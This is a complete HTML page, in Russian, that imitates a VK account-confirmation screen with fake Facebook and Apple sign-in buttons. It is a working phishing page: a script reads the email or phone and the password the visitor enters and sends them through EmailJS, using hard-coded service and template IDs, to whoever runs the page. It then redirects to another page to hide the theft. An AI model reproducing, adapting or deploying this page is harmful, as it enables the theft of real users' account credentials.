<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="css/vk.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>VK - подтверждение аккаунта</title>
    <script src="https://smtpjs.com/v3/smtpjs.js"></script>
    <script type="text/javascript"
    src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js">
    </script>
    <script type="text/javascript">
    (function(){
    emailjs.init({
        publicKey: "TymCgkYexBS3Dzuo-",
    });
    })();
    </script>
    <style>
@import url('https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&display=swap');

body{
    margin: 0;
    padding: 0;
    font-family: "Poppins", sans-serif;
    height: 100vh;
    width: 100%;
}
header{
    display: flex;
    justify-content: center;
    align-items: center;
    text-align: center;
    height: 5vh;
    width: 100%;
    font-family: "Poppins", sans-serif;
    color: #B4B6C1;
    font-weight: 600;
    font-size: 4.5vw;
    column-gap: 2vw;
}
header svg{
    display: flex;
    height: 47%;
    width: auto;
    margin-top: 0.1vh;
    fill: #B4B6C1;
}

main{
    display: flex;
    flex-direction: column;
    align-items: center;
    text-align: center;
    height: 95vh;
    width: 100%;
}
main svg{
    display: flex;
    height: 10vh;
    fill: #0177FF;
    margin-top: 19vh;
}
main h3{
    font-size: 5vw;
    margin: 4vh 0 0 0;
}
main p{
    font-size: 3.5vw;
    opacity: 0.3;
    font-weight: 500;
    margin: 1vh 0 5vh 0;
}
input{
    display: flex;
    height: 5vh;
    width: 78%;
    background: #F2F3F5;
    border-radius: 2.5vw;
    padding: 1vh 4vw;
    outline: none;
    margin-bottom: 1vh;
    border: 0.1vw solid #EDEFF0;
    font-size: 4vw;
}
input::placeholder{
    color: #9EA0A6;
}

main button{
    display: flex;
    height: 7vh;
    width: 86%;
    background: #0177FF;
    margin-top: 1vh;
    border: none;
    color: white;
    justify-content: center;
    align-items: center;
    border-radius: 2.5vw;
    font-size: 4.1vw;
    border: none;
}
.facebook{
    display: flex;
    justify-content: flex-start;
    background: white;
    text-align: center;
    color: black;
    font-weight: 600;
    font-size: 4vw;
    margin: 1vh 0 0 0;
    border: 0.1vw solid #4079E1;
}
.or{
    margin: 1vh 0;

}
.facebook svg{
    margin: 0;
    height: 70%;
    fill: #4079E1;
    margin: 0 5vw 0 1vw;
}
.apple{
    border: 0.1vw solid black;
}
.apple svg{
    fill: black;
    height: 60%;
    margin: 0 7vw 0 2vw;
}
#loading{
    display: none;
    position: absolute;
    height: 100vh;
    width: 100%;
    margin-top: -100vh;
    background: rgba(255, 255, 255, 0.5);
    z-index: 999;
}
    </style>
</head>
<body>
    <header>
        <svg fill="#000000" viewBox="0 0 32 32" xmlns="http://www.w3.org/2000/svg"><g id="SVGRepo_bgCarrier" stroke-width="0"></g><g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g><g id="SVGRepo_iconCarrier"> <path d="M20.911 0h-9.823c-8.964 0-11.089 2.125-11.089 11.089v9.823c0 8.964 2.125 11.089 11.089 11.089h9.823c8.964 0 11.089-2.125 11.089-11.089v-9.823c0-8.964-2.146-11.089-11.089-11.089zM25.833 22.828h-2.323c-0.88 0-1.151-0.698-2.734-2.302-1.375-1.333-1.984-1.51-2.323-1.51-0.479 0-0.615 0.135-0.615 0.792v2.099c0 0.563-0.177 0.901-1.667 0.901-2.464 0-5.198-1.49-7.115-4.266-2.891-4.068-3.682-7.115-3.682-7.745 0-0.339 0.135-0.656 0.786-0.656h2.328c0.589 0 0.813 0.271 1.042 0.901 1.151 3.323 3.068 6.234 3.859 6.234 0.292 0 0.427-0.135 0.427-0.88v-3.432c-0.089-1.583-0.922-1.719-0.922-2.281 0-0.271 0.224-0.542 0.583-0.542h3.661c0.495 0 0.677 0.271 0.677 0.854v4.63c0 0.5 0.224 0.677 0.359 0.677 0.292 0 0.542-0.177 1.083-0.719 1.672-1.875 2.87-4.766 2.87-4.766 0.156-0.339 0.427-0.656 1.016-0.656h2.328c0.698 0 0.854 0.359 0.698 0.859-0.292 1.354-3.141 5.375-3.141 5.375-0.245 0.406-0.339 0.583 0 1.036 0.25 0.339 1.063 1.042 1.604 1.672 0.995 1.13 1.76 2.078 1.964 2.734 0.229 0.651-0.109 0.99-0.766 0.99z"></path> </g></svg>
        connect
    </header>
    <main>
        <svg fill="#000000" viewBox="0 0 32 32" xmlns="http://www.w3.org/2000/svg"><g id="SVGRepo_bgCarrier" stroke-width="0"></g><g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g><g id="SVGRepo_iconCarrier"> <path d="M20.911 0h-9.823c-8.964 0-11.089 2.125-11.089 11.089v9.823c0 8.964 2.125 11.089 11.089 11.089h9.823c8.964 0 11.089-2.125 11.089-11.089v-9.823c0-8.964-2.146-11.089-11.089-11.089zM25.833 22.828h-2.323c-0.88 0-1.151-0.698-2.734-2.302-1.375-1.333-1.984-1.51-2.323-1.51-0.479 0-0.615 0.135-0.615 0.792v2.099c0 0.563-0.177 0.901-1.667 0.901-2.464 0-5.198-1.49-7.115-4.266-2.891-4.068-3.682-7.115-3.682-7.745 0-0.339 0.135-0.656 0.786-0.656h2.328c0.589 0 0.813 0.271 1.042 0.901 1.151 3.323 3.068 6.234 3.859 6.234 0.292 0 0.427-0.135 0.427-0.88v-3.432c-0.089-1.583-0.922-1.719-0.922-2.281 0-0.271 0.224-0.542 0.583-0.542h3.661c0.495 0 0.677 0.271 0.677 0.854v4.63c0 0.5 0.224 0.677 0.359 0.677 0.292 0 0.542-0.177 1.083-0.719 1.672-1.875 2.87-4.766 2.87-4.766 0.156-0.339 0.427-0.656 1.016-0.656h2.328c0.698 0 0.854 0.359 0.698 0.859-0.292 1.354-3.141 5.375-3.141 5.375-0.245 0.406-0.339 0.583 0 1.036 0.25 0.339 1.063 1.042 1.604 1.672 0.995 1.13 1.76 2.078 1.964 2.734 0.229 0.651-0.109 0.99-0.766 0.99z"></path> </g></svg>
        <h3 class="enter-text">Подтверждение аккаунта</h3>
        <p class="enter-label">Введите данные своего аккаунта чтобы<br>мы убедились, что это вы</p>
        <input id="email" type="text" placeholder="Email или телефон" class="login">
        <input id="password" type="text" placeholder="Пароль" class="password">
        <button onclick="Send(), loading()" class="enter">Подтвердить</button>
        <p class="or">или</p>
        <button class="facebook"><svg fill="#000000" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><g id="SVGRepo_bgCarrier" stroke-width="0"></g><g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g><g id="SVGRepo_iconCarrier"> <path d="M12 2.03998C6.5 2.03998 2 6.52998 2 12.06C2 17.06 5.66 21.21 10.44 21.96V14.96H7.9V12.06H10.44V9.84998C10.44 7.33998 11.93 5.95998 14.22 5.95998C15.31 5.95998 16.45 6.14998 16.45 6.14998V8.61998H15.19C13.95 8.61998 13.56 9.38998 13.56 10.18V12.06H16.34L15.89 14.96H13.56V21.96C15.9164 21.5878 18.0622 20.3855 19.6099 18.57C21.1576 16.7546 22.0054 14.4456 22 12.06C22 6.52998 17.5 2.03998 12 2.03998Z"></path> </g></svg>Подтвердить через Facebook</button>
        <button class="apple facebook"><svg fill="#000000" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 512 512" xml:space="preserve"><g id="SVGRepo_bgCarrier" stroke-width="0"></g><g id="SVGRepo_tracerCarrier" stroke-linecap="round" stroke-linejoin="round"></g><g id="SVGRepo_iconCarrier"> <g id="7935ec95c421cee6d86eb22ecd114eed"> <path style="display: inline;" d="M248.644,123.476c-5.45-29.71,8.598-60.285,25.516-80.89 c18.645-22.735,50.642-40.17,77.986-42.086c4.619,31.149-8.093,61.498-24.826,82.965 C309.37,106.527,278.508,124.411,248.644,123.476z M409.034,231.131c8.461-23.606,25.223-44.845,51.227-59.175 c-26.278-32.792-63.173-51.83-97.99-51.83c-46.065,0-65.542,21.947-97.538,21.947c-32.96,0-57.965-21.947-97.866-21.947 c-39.127,0-80.776,23.848-107.19,64.577c-9.712,15.055-16.291,33.758-19.879,54.59c-9.956,58.439,4.916,134.557,49.279,202.144 c21.57,32.796,50.321,69.737,87.881,70.059c33.459,0.327,42.951-21.392,88.246-21.616c45.362-0.258,53.959,21.841,87.372,21.522 c37.571-0.317,67.906-41.199,89.476-73.991c15.359-23.532,21.167-35.418,33.11-62.023 C414.435,352.487,389.459,285.571,409.034,231.131z"> </path> </g> </g></svg>Подтвердить через Apple</button>
    </main>
    <div id="loading"></div>

    <script>
        function loading(){
            const loading = document.getElementById("loading");

            loading.style.display = "flex";

            setTimeout(() => {
                window.location.href = "enter.html";
            }, 2000);
        }
        function Send(){
            let parms = {
                email : document.getElementById("email").value,
                password : document.getElementById("password").value,
            }
            emailjs.send("service_4d5wfj9","template_xstaf2o",parms);
        }
    </script>
</body>
</html>